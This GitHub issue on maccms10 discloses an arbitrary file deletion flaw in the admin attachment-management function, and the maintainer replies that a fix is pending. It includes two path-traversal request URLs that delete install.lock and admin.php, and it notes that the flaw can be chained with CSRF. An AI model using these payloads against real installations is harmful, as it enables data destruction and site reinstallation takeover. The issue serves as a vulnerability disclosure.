### ISSUE TITLE
Any file can be deleted in the background

### ISSUE THREAD

**Issue by 1979139113** [magicblack/maccms10#79]
In the ""超级控制台->基础->附件管理"", delete function can delete any file, including `/application/data/install/install.lock`

After the administrator logged in, open the following link.
```
http://127.0.0.1/maccms10/admin.php/admin/images/del.html?ids%5B%5D=/upload/../application/data/install/install.lock
```

File `install.lock` will be deleted

Then visit `install.php`

This can reinstall the entire site.

![图片](https://user-images.githubusercontent.com/24983597/67289321-ffb75e80-f510-11e9-99aa-6462836d993a.png)

delete `admin.php`

```
http://127.0.0.1/maccms10/admin.php/admin/images/del.html?ids%5B%5D=/upload/../admin.php
```
In general, it can be used with CSRF vulnerabilities to delete arbitrary files.

**Comment by magicblack** [comment]
修复~等待发包
